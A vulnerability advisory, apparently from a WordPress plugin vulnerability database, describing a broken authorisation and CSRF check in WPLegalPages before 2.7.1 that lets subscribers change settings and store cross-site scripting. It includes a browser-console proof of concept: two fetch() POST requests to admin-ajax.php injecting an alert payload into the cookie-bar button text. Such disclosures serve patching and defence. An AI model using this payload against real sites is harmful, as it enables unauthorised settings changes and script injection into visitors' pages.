WordPress Plugin Vulnerabilities
WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS
Description
The plugin does not check for authorisation and has a flawed CSRF logic when saving its settings, allowing any authenticated users, such as subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, it could lead to Stored Cross-Site Scripting
Proof of Concept
Run the below command in the web developer console of the web browser when being authenticated as any user
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"lp_save_admin_settings", "lp-cookie-bar": "ON"}),
"method": "POST",
"credentials": "include"
});fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//"}),
"method": "POST",
"credentials": "include"
});
The XSS will be triggered in all frontend pages Affects Plugins
Fixed in version 2.7.1
References
Classification
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-01-05 (about 4 months ago)
Added
2022-01-05 (about 4 months ago)
Last Updated
2022-04-08 (about 1 months ago)